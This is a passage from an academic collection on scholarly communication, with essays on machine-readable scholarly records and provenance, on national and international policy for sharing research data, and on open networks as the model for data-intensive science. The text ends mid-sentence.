a machine-actionable representation of scholarly knowledge can help scholars and learners deal with information abundance. It can allow for new discoveries to be made by reasoning over a body of established knowledge, and it can increase the speed of discovery by helping scholars to avoid redundant research and by revealing promising avenues for new research. Integration of Datasets into the Scholarly Record Even though data have always been a crucial ingredient in scientific explorations, until recently they were not treated as first-class objects in scholarly communication, as were the research papers that reported on findings extracted from the data. This is rapidly and fundamentally changing. The scientific community is actively discussing and exploring implementation of all core functions of scholarly communicationregistration, certification, awareness, archiving, and rewarding [1] for datasets. For example, the Data Pyramid proposed in [6] clearly indicates how attention to trust (certification) and digital preservation (archiving) for datasets becomes vital as their application reaches beyond personal use and into the realms of disciplinary communities and society at large. The international efforts aimed at enabling the sharing of research data [7] reflect recognition of the need for an infrastructure to facilitate discovery of shared datasets (awareness). And efforts aimed at defining a standard citation format for datasets [8] take for granted that they are primary scholarly artifacts. These efforts are motivated in part by the belief that researchers should gain credit (be rewarded) for the datasets they have compiled and shared. Less than a decade or so ago, these functions of scholarly communication largely applied only to the scholarly literature. Exposure of Process and Its Integration into the Scholarly Record Certain aspects of the scholarly communication process have been exposed for a long time. Citations made in publications indicate the use of prior knowledge to generate new insights. In this manner, the scholarly citation graph reveals aspects of scholarly dynamics and is thus actively used as a research focus to detect 195 connections between disciplines and for trend analysis and prediction. However, interpretation of the scholarly citation graph is often error prone due to imperfect manual or automatic citation extraction approaches and challenging author disambiguation issues. The coverage of citation graph data is also partial (top-ranked journals only or specific disciplines only), and unfortunately the most representative graph (Thomson Reuters) is proprietary. The citation graph problem is indicative of a broader problem: there is no unambiguous, recorded, and visible trace of the evolution of a scholarly asset through the system, nor is there information about the nature of the evolution. The problem is that relationships, which are known at the moment a scholarly asset goes through a step in a value chain, are lost the moment immediately after, in many cases forever. The actual dynamics of scholarshipthe interaction/connection between assets, authors, readers, quality assessments about assets, scholarly research areas, and so onare extremely hard to recover after the fact. Therefore, it is necessary to establish a layer underlying scholarly communicationa grid for scholarly communication that records and exposes such dynamics, relationships, and interactions. A solution to this problem is emerging through a number of innovative initiatives that make it possible to publish information about the scholarly process in machinereadable form to the Web, preferably at the moment that events of the abovedescribed type happen and hence, when all required information is available. Specific to the citation graph case, the Web-oriented citation approach explored by the CLADDIER project demonstrates a mechanism for encoding an accurate, crawlable citation graph on the Web. Several initiatives are aimed at introducing author identifiers [9] that could help establish a less ambiguous citation graph. A graph augmented with citation semantics, such as that proposed by the Citation Typing Ontology effort, would also reveal why an artifact is being citedan important bit of information that has remained elusive until now [10]. Moving beyond citation data, other efforts to expose the scholarly process include projects that aim to share scholarly usage data (the process of paying attention to scholarly information), such as COUNTER, MESUR, and the bX scholarly recommender service. Collectively, these projects illustrate the broad applicability of this type of process-related information for the purpose of collection development, computation of novel metrics to assess the impact of scholarly artifacts [11], analysis of current research trends [12], and recommender systems. As a result of this work, several projects in Europe are pursuing technical solutions for sharing detailed usage data on the Web. 196 Another example of process capture is the successful myExperiment effort, which provides a social portal for sharing computational workflow descriptions. Similar efforts in the chemistry community allow the publication and sharing of laboratory notebook information on the Web [13]. We find these efforts particularly inspiring because they allow us to imagine a next logical step, which would be the sharing of provenance data. Provenance data reveal the history of inputs and processing steps involved in the execution of workflows and are a critical aspect of scientific information, both to establish trust in the veracity of the data and to support the reproducibility demanded of all experimental science. Recent work in the computer science community [14] has yielded systems capable of maintaining detailed provenance information within a single environment. We feel that provenance information that describes and interlinks workflows, datasets, and processes is a new kind of process-type metadata that has a key role in network-based and data-intensive sciencesimilar in importance to descriptive metadata, citation data, and usage data in article-based scholarship. Hence, it seems logical that eventually provenance information will be exposed so it can be leveraged by a variety of tools for discovery, analysis, and impact assessment of some core products of new scholarship: workflows, datasets, and processes. Looking Forward As described above, the scholarly record will emerge as the result of the intertwining of traditional and new scholarly artifacts, the development of a machineactionable scholarly knowledge substrate, and the exposure of meta-information about the scholarly process. These facilities will achieve their full potential only if they are grounded in an appropriate and interoperable cyberinfrastructure that is based on the Web and its associated standards. The Web will not only contribute to the sustainability of the scholarly process, but it will also integrate scholarly debate seamlessly with the broader human debate that takes place on the Web. We have recently seen an increased Web orientation in the development of approaches to scholarly interoperability. This includes the exploration or active use of uniform resource identifiers (URIs), more specifically HTTP URIs, for the identification of scholarly artifacts, concepts, researchers, and institutions, as well as the use of the XML, RDF, RDFS, OWL, RSS, and Atom formats to support the representation and communication of scholarly information and knowledge. These foundational technologies are increasingly being augmented with community- 197 specific and community-driven yet compliant specializations. Overall, a picture is beginning to emerge in which all constituents of the new scholarly record (both human and machine-readable) are published on the Web, in a manner that complies with general Web standards and community-specific specializations of those standards. Once published on the Web, they can be accessed, gathered, and mined by both human and machine agents. Our own work on the OAI Object Reuse & Exchange (OAI-ORE) specifications [15], which define an approach to identifying and describing eScience assets that are aggregations of multiple resources, is an illustration of this emerging Webcentric cyberinfrastructure approach. It builds on core Web technologies and also adheres to the guidelines of the Linked Data effort, which is rapidly emerging as the most widespread manifestation of years of Semantic Web work. When describing this trend toward the use of common Web approaches for scholarly purposes, we are reminded of Jim Gray, who insisted throughout the preliminary discussions leading to the OAI-ORE work that any solution should leverage common feed technologiesRSS or Atom. Jim was right in indicating that many special-purpose components of the cyberinfrastructure need to be developed to meet the requirements of scholarly communication, and in recognizing that others are readily available as a result of general Web standardization activities. As we look into the short-term future, we are reminded of one of Jim Grays well-known quotes: May all your problems be technical. With this ironic comment, Jim was indicating that behind even the most difficult technical problems lies an even more fundamental problem: assuring the integration of the cyberinfrastructure into human workflows and practices. Without such integration, even the best cyberinfrastructure will fail to gain widespread use. Fortunately, there are indications that we have learned this lesson from experience through the years with other large-scale infrastructure projects such as the Digital Libraries Initiatives. The Sustainable Digital Data Preservation and Access Network Partners (DataNet) program funded by the Office of Cyberinfrastructure at the U.S. National Science Foundation (NSF) has recently awarded funding for two 10-year projects that focus on cyberinfrastructure as a sociotechnical problemone that requires both knowledge of technology and understanding of how the technology integrates into the communities of use. We believe that this wider focus will be one of the most important factors in changing the nature of scholarship and the ways that it is communicated over the coming decade. We are confident that the combination of the continued evolution of the 198 Web, new technologies that leverage its core principles, and an understanding of the way people use technology will serve as the foundation of a fundamentally rethought scholarly communication system that will be friendly to both humans and machines. With the emergence of that system, we will happily refrain from using our once-beloved scanned copy metaphor. REFERENCES [1] H. Van de Sompel, S. Payette, J. Erickson, C. Lagoze, and S. Warner, Rethinking Scholarly Communication: Building the System that Scholars Deserve, D-Lib Mag., vol. 10, no. 9, 2004,. [2] P. Murray-Rust and H. S. Rzepa, The Next Big Thing: From Hypermedia to Datuments, J. Digit. Inf., vol. 5, no. 1, 2004. [3] C. L. Palmer, M. H. Cragin, and T. P. Hogan, Weak information work in scientific discovery, Inf. Process. Manage., vol. 43, no. 3., pp. 808820, 2007, doi: 10.1016/j.ipm.2006.06.003. [4] A. Ruttenberg, T. Clark, W. Bug, M. Samwald, O. Bodenreider, H. Chen, D. Doherty, K. Forsberg, Y. Gao, V. Kashyap, J. Kinoshita, J. Luciano, M. S. Marshall, C. Ogbuji, J. Rees, S. Stephens, G. T. Wong, E. Wu, D. Zaccagnini, T. Hongsermeier, E. Neumann, I. Herman, and K. H. Cheung, Advancing translational research with the Semantic Web, BMC Bioinf., vol. 8, suppl. 3, p. S2, 2007, doi: 10.1186/1471-2105-8-S3-S2. [5] D. Shotton, K. Portwin, G. Klyne, and A. Miles, Adventures in Semantic Publishing: Exemplar Semantic Enhancements of a Research Article, PLoS Comput. Biol., vol. 5, no. 4, p. e1000361, 2009, doi: 10.1371/journal.pcbi.1000361. [6] F. Berman, Got data?: a guide to data preservation in the information age, Commun. ACM, vol. 51, no. 12, pp. 5056, 2008, doi: 10.1145/1409360.1409376. [7] R. Ruusalepp, Infrastructure Planning and Data Curation: A Comparative Study of International Approaches to Enabling the Sharing of Research Data, JISC, Nov. 30, 2008, docs/publications/reports/Data_Sharing_Report.pdf. [8] M. Altman and G. King, A Proposed Standard for the Scholarly Citation of Quantitative Data, D-Lib Magazine, vol. 13, no. 3/4, 2007. [9] M. Enserink, Science Publishing: Are You Ready to Become a Number? Science, vol. 323, no. 5922, 2009, doi: 10.1126/science.323.5922.1662. [10] N. Kaplan, The norm of citation behavior, Am. Documentation, vol. 16. pp. 179184, 1965. [11] J. Bollen, H. Van de Sompel, A. Hagberg, and R. Chute, A Principal Component Analysis of 39 Scientific Impact Measures, PLoS ONE, vol. 4, no. 6, p. e6022, 2009, doi: 10.1371/journal. pone.0006022. [12] J. Bollen, H. Van de Sompel, A. Hagberg, L. Bettencourt, R. Chute, and L. Balakireva, Clickstream Data Yields High-Resolution Maps of Science, PLoS ONE, vol. 4, no. 3, p. e4803, 2009, doi: 10.1371/journal.pone.0004803. [13] S. J. Coles, J. G. Frey, M. B. Hursthouse, M. E. Light, A. J. Milsted, L. A. Carr, D. De Roure, C. J. Gutteridge, H. R. Mills, K. E. Meacham, M. Surridge, E. Lyon, R. Heery, M. Duke, and M. Day, An e-science environment for service crystallography from submission to dissemination, J. Chem. Inf. Model., vol. 46, no. 3, 2006, doi: 10.1021/ci050362w. [14] R. Bose and J. Frew, Lineage retrieval for scientific data processing: a survey, ACM Comput. Surv. (CSUR), vol. 37, no. 1, pp. 128, 2005, doi: 10.1145/1057977.1057978. [15] H. Van de Sompel, C. Lagoze, C. E. Nelson, S. Warner, R. Sanderson, and P. Johnston, Adding eScience Publications to the Data Web, Proc. Linked Data on the Web 2009, Madrid. 199 s c h o l a r ly co m m u n i c at i o n An n e Fitzge r ald Br ian Fitzge r ald K ylie Pappal ar do Queensland University of Technology dvances in information and communication technologies have brought about an information revolution, leading to fundamental changes in the way that information is collected or generated, shared, and distributed [1, 2]. The importance of establishing systems in which research findings can be readily made available to and used by other researchers has long been recognized in international scientific collaborations. Acknowledgment of the need for data access and sharing is most evident in the framework documents underpinning many of the large-scale observational projects that generate vast amounts of data about the Earth, water, the marine environment, and the atmosphere. For more than 50 years, the foundational documents of major collaborative scientific projects have typically included as a key principle a commitment to ensuring that research outputs will be openly and freely available. While these agreements are often entered into at the international level (whether between governments or their representatives in international organizations), individual researchers and research projects typically operate locally, within a national jurisdiction. If the data access principles adopted by international scientific collaborations are to be effectively implemented, they must be supported by the national policies and laws in place in the countries in which participating researchers 201 are operating. Failure to establish a bridge between, on the one hand, data access principles enunciated at the international level and, on the other hand, the policies and laws at the national level means that the benefits flowing from data sharing are at risk of being thwarted by domestic objectives [3]. The need for coherence among data sharing principles adopted by international science collaborations and the policy and legal frameworks in place in the national jurisdictions where researchers operate is highlighted by the Global Earth Observation System of Systems1 (GEOSS) initiated in 2005 by the Group on Earth Observations (GEO) [1, p. 125]. GEOSS seeks to connect the producers of environmental data and decision-support tools with the end users of these products, with the aim of enhancing the relevance of Earth observations to global issues. The end result will be a global public infrastructure that generates comprehensive, nearreal-time environmental data, information, and analyses for a wide range of users. The vision for GEOSS is as a system of systems, built on existing observational systems and incorporating new systems for Earth observation and modeling that are offered as GEOSS components. This emerging public infrastructure links a diverse and growing array of instruments and systems for monitoring and forecasting changes in the global environment. This system of systems supports policymakers, resource managers, science researchers, and many other experts and decision makers. International Policies One of GEOs earliest actions was to explicitly acknowledge the importance of data sharing in achieving its vision and to agree on a strategic set of data sharing principles for GEOSS [4]: There will be full and open exchange of data, metadata and products shared within GEOSS, recognizing relevant international instruments, and national policies and legislation. All shared data, metadata, and products will be made available with minimum time delay and at minimum cost. All shared data, metadata, and products free of charge or no more than cost of reproduction will be encouraged for research and education. 1 202 These principles, though significant, are not strictly new. A number of other international policy statements promote public availability and open exchange of data, including the Bermuda Principles (1996) and the Berlin Declaration on Open Access to Knowledge in the Sciences and Humanities (2003) [5]. The Bermuda Principles were developed by scientists involved in the International Human Genome Sequencing Consortium and their funding agencies and represented an agreement among researchers about the need to establish a basis for the rapid and open sharing of prepublication data on gene sequences [6]. The Bermuda Principles required automatic release of sequence assemblies larger than 1 KB and immediate publication of finished annotated sequences. They sought to make the entire gene sequence freely available to the public for research and development in order to maximize benefits to society. The Berlin Declaration had the goal of supporting the open access paradigm via the Internet and promoting the Internet as a fundamental instrument for a global scientific knowledge base. It defined open access contribution to include scientific research results, raw data, and metadata, and it required open access contributions to be deposited in an online repository and made available under a free, irrevocable, worldwide, right of access to, and a license to copy, use, distribute, transmit and display the work publicly and to make and distribute derivative works, in any digital medium for any responsible purpose, subject to proper attribution of authorship. [7] In fact, the GEOSS principles map closely to the data sharing principles espoused in the Antarctic Treaty, signed almost 50 years earlier in Washington, D.C., in 1959, which has received sustained attention in Australia, particularly in relation to marine data research.2 Article III of the Antarctic Treaty states: 1. In order to promote international cooperation in scientific investigation in Antarctica, as provided for in Article II of the present Treaty, the Contracting Parties agree that, to the greatest extent feasible and practicable: (c) scientific observations and results from Antarctica shall be exchanged and made freely available. [8] The data sharing principles stated in the Antarctic Treaty, the GEOSS 10-Year Implementation Plan, the Bermuda Principles, and the Berlin Declaration, among 2 Other international treaties with such provisions include the UN Convention on the Law of the Sea, the Ozone Protocol, the Convention on Biodiversity, and the Aarhus Convention. 203 others, are widely acknowledged to be not only beneficial but crucial to information flows and the availability of data. However, problems arise because, in the absence of a clear policy and legislative framework at the national level, other considerations can operate to frustrate the effective implementation of the data sharing objectives that are central to international science collaborations [5, 9]. Experience has shown that without an unambiguous statement of data access policy and a supporting legislative framework, good intentions are too easily frustrated in practice. National Frameworks The key strategy in ensuring that international policies requiring full and open exchange of data are effectively acted on in practice lies in the development of a coherent policy and legal framework at a national level. (See Figure 1.) The national framework must support the international principles for data access and sharing but also be clear and practical enough for researchers to follow at a research project level. While national frameworks for data sharing are well established in the United States and Europe, this is not the case in many other jurisdictions (including Australia). Kim Finney of the Antarctic Data Centre has drawn attention to the difficulties in implementing Article III(1)(c) of the Antarctic Treaty in the absence of established data access policies in signatories to the treaty. She points International out that being able to achieve the goal International Policies Legal set out in the treaty requires a genuine e.g., GEOSS dataInstruments sharing principles, willingness on the part of scientists to e.g., OECD Antarctic Treaty, Recommendations make their data available to other reBermuda Principles searchers. This willingness is lacking, despite the treatys clear intention that Antarctic science data be exchanged National and made freely available. Finney arFrameworks gues that there is a strong need for a data access policy in Antarctic member Data states, because without such a policy, Management the level of conformance with the aspiPlans rations set out in the Antarctic Treaty is patchy at best [10] [1, pp. 7778]. FIGURE 1. In the U.S., the Office of ManageA regulatory framework for data-sharing ment and Budget (OMB) Circular A-130 arrangements. 204 establishes the data access and reuse policy framework for the executive branch departments and agencies of the U.S. federal government [11] [1, pp. 174175]. As well as acknowledging that government information is a valuable public resource and that the nation stands to benefit from the dissemination of government information, OMB Circular A-130 requires that improperly restrictive practices be avoided. Additionally, Circular A-16, entitled Coordination of Geographic Information and Related Spatial Data Activities, provides that U.S. federal agencies have a responsibility to [c]ollect, maintain, disseminate, and preserve spatial information such that the resulting data, information, or products can be readily shared with other federal agencies and non-federal users, and promote data integration between all sources. [12] [1, pp. 181183] In Europe, the policy framework consists of the broad-reaching Directive on the Re-use of Public Sector Information (2003) (the PSI Directive) [13], as well as the specific directive establishing an Infrastructure for Spatial Information (2007) (the INSPIRE Directive) [14] and the Directive on Public Access to Environmental Information (2003) [15], which obliges public authorities to provide timely access to environmental information. In negotiating the PSI Directive, the European Parliament and Council of the European Union recognized that the public sector is the largest producer of information in Europe and that substantial social and economic benefits stood to be gained if this information were available for access and reuse. However, European content firms engaging in the aggregation of information resources into valueadded information products would be at a competitive disadvantage if they did not have clear policies or uniform practices to guide them in relation to access to and reuse of public sector information. The lack of harmonization of policies and practices regarding public sector information was seen as a barrier to the development of digital products and services based on information obtained from different countries [1, pp. 137138]. In response, the PSI Directive establishes a framework of rules governing the reuse of existing documents held by the public sector bodies of EU member states. Furthermore, the INSPIRE Directive establishes EU policy and principles relating to spatial data held by or on behalf of public authorities and to the use of spatial data by public authorities in the performance of their public tasks. Unlike the U.S. and Europe, however, Australia does not currently have a national policy framework addressing access to and use of data. In particular, the current situation with respect to public sector information (PSI) access and reuse is fragmented and lacks a coherent policy foundation, whether viewed in terms of 205 interactions within or among the different levels of government at the local, state/ territory, and federal levels or between the government, academic, and private sectors.3 In 2008, the Venturous Australia report of the Review of the National Innovation System recommended (in Recommendation 7.7) that Australia establish a National Information Strategy to optimize the flow of information in the Australian economy [16]. However, just how a National Information Strategy could be established remains unclear. A starting point for countries like Australia that have yet to establish national frameworks for the sharing of research outputs has been provided by the Organisation for Economic Co-operation and Development (OECD). At the Seoul Ministerial Meeting on the Future of the Internet Economy in 2008, the OECD Ministers endorsed statements of principle on access to research data produced as a result of public funding and on access to public sector information. These documents establish principles to guide availability of research data, including openness, transparency, legal conformity, interoperability, quality, efficiency, accountability, and sustainability, similar to the principles expressed in the GEOSS statement. The openness principle in the OECD Councils Recommendation on Access to Research Data from Public Funding (2006) states: A) Openness Openness means access on equal terms for the international research community at the lowest possible cost, preferably at no more than the marginal cost of dissemination. Open access to research data from public funding should be easy, timely, user-friendly and preferably Internet-based. [17] OECD Recommendations are OECD legal instruments that describe standards or objectives that OECD member countries (such as Australia) are expected to implement, although they are not legally binding. However, through long-standing practice of member countries, a Recommendation is considered to have great moral force [2, p. 11]. In Australia, the Prime Ministers Science, Engineering and Innovation Council (PMSEIC) Data for Science Working Group, in its 2006 report From Data to Wisdom: Pathways to Successful Data Management for Australian Science, recommended that OECD guidelines be taken into account in the development of a strategic framework for management of research data in Australia [18]. The development of a national framework for data management based on 3 There has been little policy advancement in Australia on the matter of access to government information since the Office of Spatial Data Managements Policy on Spatial Data Access and Pricing in 2001. 206 principles promoting data access and sharing (such as the OECD Recommendation) would help to incorporate international policy statements and protocols such as the Antarctic Treaty and the GEOSS Principles into domestic law. This would provide stronger guidance (if not a requirement) for researchers to consider and, where practicable, incorporate these data sharing principles into their research project data management plans [5, 9]. Conclusion Establishing data sharing arrangements for complex, international eResearch collaborations requires appropriate national policy and legal frameworks and data management practices. While international science collaborations typically express a commitment to data access and sharing, in the absence of a supporting national policy and legal framework and good data management practices, such objectives are at risk of not being implemented. Many complications are inherent in eResearch science collaborations, particularly where they involve researchers operating in distributed locations. Technology has rendered physical boundaries irrelevant, but legal jurisdictional boundaries remain. If research data is to flow as intended, it will be necessary to ensure that national policies and laws support the data access systems that have long been regarded as central to international science collaborations. In developing policies, laws, and practices at the national level, guidance can be found in the OECDs statements on access to publicly funded research data, the U.S. OMBs Circular A-130, and various EU directives. It is crucial that countries take responsibility for promoting policy goals for access and reuse of data at all three levels in order to facilitate information flows. It is only by having the proper frameworks in place that we can be sure to keep afloat in the data deluge. References [1] A. Fitzgerald, A review of the literature on the legal aspects of open access policy, practices and licensing in Australia and selected jurisdictions, July 2009, Cooperative Research Centre for Spatial Information and Queensland University of Technology,. [2] Submission of the Intellectual Property: Knowledge, Culture and Economy (IP: KCE) Research Program, Queensland University of Technology, to the Digital Economy Future Directions paper, Australian Government, prepared by B. Fitzgerald, A. Fitzgerald, J. Coates, and K. Pappalardo, Mar. 4, 2009, p. 2, University_of_Technology_QUT_Law_Faculty.pdf. [3] B. Fitzgerald, Ed., Legal Framework for e-Research: Realising the Potential. Sydney University Press, 2008,. [4] Group on Earth Observations (GEO), GEOSS 10-Year Implementation Plan, adopted Feb. 16, 207 2005, p. 4,. [5] A. Fitzgerald and K. Pappalardo, Building the Infrastructure for Data Access and Reuse in Collaborative Research: An Analysis of the Legal Context, OAK Law Project and Legal Framework for e-Research Project, 2007,. [6] Bermuda Principles, 1996,. shtml, accessed on June 10, 2009. [7] Berlin Declaration on Open Access to Knowledge in the Sciences and Humanities (2003),, accessed on June 10, 2009. [8] The Antarctic Treaty (1959), signed in Washington, D.C., Dec. 1, 1959; entry into force for Australia and generally: June 23, 1961, [1961] ATS 12 (Australian Treaty Series, 1961, no. 12),, accessed June 5, 2009. [9] A. Fitzgerald, K. Pappalardo, and A. Austin, Practical Data Management: A Legal and Policy Guide, OAK Law Project and Legal Framework for e-Research Project, 2008,. [10] Scientific Committee on Antarctic Research (SCAR) Data and Information Strategy 20082013, Joint Committee on Antarctic Data Management (JCADM) and Standing Committee on Antarctic Geographic Information (SC-AGI), authored by K. Finney, Australian Antarctic Data Centre, Australian Antarctic Division (revised May 2008), p. 40, filesystem/jcadm_group/Strategy/SCAR_DIM_StrategyV2-CSKf_final.pdf. [11] Office of Management and Budget Circular A-130 on Management of Federal Information Resources (OMB Circular A-130), 2000,. [12] Office of Management and Budget Circular A-16 on the Coordination of Geographic Information and Related Spatial Data Activities (OMB Circular A-16), issued Jan. 16, 1953, revised 1967, 1990, 2002, Sec. 8,. [13] European Parliament and Council of the European Union, Directive 2003/98/EC of the European Parliament and of the Council of 17 November 2003 on the re-use of the public sector information, 2003, OJ L 345/90,: 32003L0098:EN:HTML. [14] European Parliament and Council of the European Union, Directive 2007/2/EC of the European Parliament and of the Council of 14 March 2007 establishing an infrastructure for spatial information, 2007, OJ L 108/1, Apr. 25, 2007, OJ:L:2007:108:0001:01:EN:HTML. [15] European Parliament and Council of the European Union, Directive 2003/4/EC of the European Parliament and of the Council of 28 January 2003 on public access to environmental information and Repealing Council Directive 90/313/EEC OJL 041, Feb. 14, 2003, pp. 00260032,. [16] Cutler & Company, Venturous Australia: Building Strength in Innovation, Review of the National Innovation System, p. 95, 2008,. [17] OECD, Recommendation of the Council concerning Access to Research Data from Public Funding, C(2006)184, Dec. 14, 2006, A5FB1397B5ADFB7C12572980053C9D3?OpenDocument, accessed on June 5, 2009. Note that these have also been published in OECD Principles and Guidelines for Access to Research Data from Public Funding, 2007. [18] Prime Ministers Science, Engineering and Innovation Council (PMSEIC) Working Group on Data for Science, From Data to Wisdom: Pathways to Successful Data Management for Australian Science, Recommendation 9, p. 12, Dec. 2006, innovation/publications_resources/profiles/Presentation_Data_for_Science.htm. 208 s c h o l a r ly co m m u n i c at i o n tend to get nervous when i hear talk of paradigm shifts. The term itself has been debased through inaccurate popular useeven turning into a joke on The Simpsonsbut its original role in Thomas Kuhns Structure of Scientific Revolutions [1] is worth revisiting as we examine the idea of a Fourth Paradigm and its impact on scholarly communication [2]. Kuhns model describes a world of science in which a set of ideas becomes dominant and entrenched, creating a worldview (the infamous paradigm) that itself gains strength and power. This set of ideas becomes powerful because it represents a plausible explanation for observed phenomena. Thus we get the luminiferous aether, the miasma theory of infectious disease, and the idea that the sun revolves around the Earth. The set of ideas, the worldview, the paradigm, gains strength through incrementalism. Each individual scientist tends to work in a manner that adds, bit by bit, to the paradigm. The individual who can make a big addition to the worldview gains authority, research contracts, awards and prizes, and seats on boards of directors. All involved gain an investment in the set of ideas that goes beyond the ideas themselves. Industries and governments (and the people who work in them) build businesses and policies that depend on the worldview. This adds a layer of defensean immune system of sortsthat protects the worldview against attack. 209 Naysayers are marginalized. New ideas lie fallow, unfunded, and unstaffed. Fear, uncertainty, and doubt color perceptions of new ideas, methods, models, and approaches that challenge the established paradigm. Yet worldviews fall and paradigms shatter when they stop explaining the observed phenomena or when an experiment conclusively proves the paradigm wrong. The aether was conclusively disproven after hundreds of years of incrementalism. As was miasma, as was geocentricism. The time for a shift comes when the old ways of explaining things simply can no longer match the new realities. This strikes me as being the idea behind Jim Grays argument about the fourth data paradigm [3] and the framing of the data delugethat our capacity to measure, store, analyze, and visualize data is the new reality to which science must adapt. Data is at the heart of this new paradigm, and it sits alongside empiricism, theory, and simulation, which together form the continuum we think of as the modern scientific method. But I come to celebrate the first three paradigms, not to bury them. Empiricism and theory got us a long way, from a view of the world that had the sun revolving around the Earth to quantum physics. Simulation is at the core of so much contemporary science, from anthropological re-creations of ancient Rome to weather prediction. The accuracy of simulations and predictions represents the white-hot center of policy debates about economics and climate change. And its vital to note that empiricism and theory are essential to a good simulation. I can encode a lovely simulation on my screen in which there is no theory of gravity, but if I attempt to drive my car off a cliff, empiricism is going to bite my backside on the way down. Thus, this is actually not a paradigm shift in the Kuhnian sense. Data is not sweeping away the old reality. Data is simply placing a set of burdens on the methodologies and social habits we use to deal with and communicate our empiricism and our theory, on the robustness and complexity of our simulations, and on the way we expose, transmit, and integrate our knowledge. What needs to change is our paradigm of ourselves as scientistsnot the old paradigms of discovery. When we started to realize that stuff was made of atoms, that we were made of genes, that the Earth revolved around the sun, those were paradigm shifts in the Kuhnian sense. What were talking about here cuts across those classes of shift. Data-intensive science, if done right, will mean more paradigm shifts of scientific theory, happening faster, because we can rapidly assess our worldview against the objective reality we can so powerfully measure. The data deluge strategy might be better informed by networks than by Kuhnian 210 dynamics. Networks have a capacity to scale that is useful in our management of the data overloadthey can convert massive amounts of information into a good thing so the information is no longer a problem that must be solved. And there is a lesson in the way networks are designed that can help us in exploring the data deluge: if we are to manage the data deluge, we need an open strategy that follows the network experience. By this I mean the end-to-end, layer-by-layer, designed information technology and communications networks that are composed of no more than a stack of protocols. The Internet and the Web have been built from documents that propose standard methods for transferring information, describing how to display that information, and assigning names to computers and documents. Because we all agree to use those methods, because those methods can be used by anyone without asking for permission, the network emerges and scales. In this view, data is not a fourth paradigm but a fourth network layer (atop Ethernet, TCP/IP, and the Web [4]) that interoperates, top to bottom, with the other layers. I believe this view captures the nature of the scientific method a little better than the concept of the paradigm shift, with its destructive nature. Data is the result of incremental advances in empiricism-serving technology. It informs theory, it drives and validates simulations, and it is served best by two-way, standard communication with those layers of the knowledge network. To state it baldly, the paradigm that needs destruction is the idea that we as scientists exist as un-networked individuals. Now, if this metaphor is acceptable, it holds two lessons for us as we contemplate network design for scholarly communication at the data-intensive layer. The first lesson, captured perfectly by David Isenberg, is that the Internet derives its disruptive quality from a very special property: IT IS PUBLIC. [5] Its public in several ways. The standard specifications that define the Internet are themselves open and publicfree to read, download, copy, and make derivatives from. Theyre open in a copyright sense. Those specifications can be adopted by anyone who wants to make improvements and extensions, but their value comes from the fact that a lot of people use them, not because of private improvements. As Isenberg notes, this allows a set of miracles to emerge: the network grows without a master, lets us innovate without asking for permission, and grows and discovers markets (think e-mail, instant messaging, social networks, and even pornography). Changing the public nature of the Internet threatens its very existence. This is not intuitive to those of us raised in a world of rivalrous economic goods and 211 traditional economic theory. It makes no sense that Wikipedia exists, let alone that it kicks Encyclopedia Britannica to the curb. As Galileo might have said, however, And yet it moves. [6] Wikipedia does exist, and the networka consensual hallucination defined by a set of dry requests for commentscarries Skype video calls for free between me and my family in Brazil. It is an engine for innovation the likes of which we have never seen. And from the network, we can draw the lesson that new layers of the network related to data should encode the idea of publicnessof standards that allow us to work together openly and transfer the network effects we know so well from the giant collection of documents that is the Web to the giant collections of data we can so easily compile. The second lesson comes from another open world, that of open source software. Software built on the model of distributed, small contributions joined together through technical and legal standardization was another theoretical impossibility subjected to a true Kuhnian paradigm shift by the reality of the Internet. The ubiquitous ability to communicate, combined with the low cost of acquiring programming tools and the visionary application of public copyright licenses, had the strangest impact: it created software that worked, and scaled. The key lesson is that we can harness the power of millions of minds if we standardize, and the products can in many cases outperform those built in traditional, centralized environments. (A good example is the Apache Web server, which has been the most popular Web server software on the Internet since 1996.) Creative Commons applied these lessons to licensing and created a set of standard licenses for cultural works. These have in turn exploded to cover hundreds of millions of digital objects on the network. Open licensing turns out to have remarkable benefitsit allows for the kind of interoperability (and near-zero transaction costs) that we know from technical networks to occur on a massive scale for rights associated with digital objects such as songs and photographsand scientific information. Incentives are the confounding part of all of this to traditional economic theory. Again, this is a place where a Kuhnian paradigm shift is indeed happeningthe old theory could not contemplate a world in which people did work for free, but the new reality proves that it happens. Eben Moglen provocatively wrote in 1999 that collaboration on the Internet is akin to electrical inductionan emergent property of the network unrelated to the incentives of any individual contributor. We should not ask why there is an incentive for collaborative software development any more than we ask why electrons move in a current across a wire. We should instead ask, 212 what is the resistance in the wire, or in the network, to the emergent property? Moglens Metaphorical Corollaries to Faradays Law and Ohms Law1 still resonate 10 years on. There is a lot of resistance in the network to a data-intensive layer. And its actually not based nearly as much on intellectual property issues as it was on software (although the field strength of copyright in resisting the transformation of peerreviewed literature is very strong and is actively preventing the Web revolution in that realm of scholarly communication). With data, problems are caused by copyright,2 but resistance also comes from many other sources: its hard to annotate and reuse data, its hard to send massive data files around, its hard to combine data that was not generated for recombination, and on and on. Thus, to those who didnt generate it, data has a very short half-life. This resistance originates with the paradigm of ourselves as individual scientists, not the paradigms of empiricism, theory, or simulation. I therefore propose that our focus be Moglen-inspired and that we resist the resistance. We need investment in annotation and curation, in capacity to store and render data, and in shared visualization and analytics. We need open standards for sharing and exposing data. We need the RFCs (Requests for Comments) of the data layer. And, above all, we need to teach scientists and scholars to work in this new layer of data. As long as we practice a micro-specialization guild culture of training, the social structure of science will continue to provide significant resistance to the data layer. We need to think of ourselves as connected nodes that need to pass data, test theories, access each others simulations. And given that every graph about data collection capacity is screaming up exponentially, we need scale in our capacity to use that data, and we need it badly. We need to network ourselves and our knowledge. Nothing else we have designed to date as humans has proven to scale as fast as an open network. Like all metaphors, the network one has its limits. Networking knowledge is harder than networking documents. Emergent collaboration in software is easier 1 Moglens Metaphorical Corollary to Faradays Law says that if you wrap the Internet around every person on the planet and spin the planet, software ows in the network. Its an emergent property of connected human minds that they create things for one anothers pleasure and to conquer their uneasy sense of being too alone. The only question to ask is, whats the resistance of the network? Moglens Metaphorical Corollary to Ohms Law states that the resistance of the network is directly proportional to the eld strength of the intellectual property system. [7] 2 Data receives wildly different copyright treatment across the world, which causes confusion and makes international licensing schemes complex and difficult. [8] 213 because the tools are cheap and ubiquitousthats not the case in high-throughput physics or molecular biology. Some of the things that make the Web great dont work so well for science and scholarship because the concept of agreement-based ratings find you only the stuff that represents a boring consensus and not the interesting stuff along the edges. But there is precious little in terms of alternatives to the network approach. The data deluge is real, and its not slowing down. We can measure more, faster, than ever before. We can do so in massively parallel fashion. And our brain capacity is pretty well frozen at one brain per person. We have to work together if were going to keep up, and networks are the best collaborative tool weve ever built as a culture. And that means we need to make our data approach just as open as the 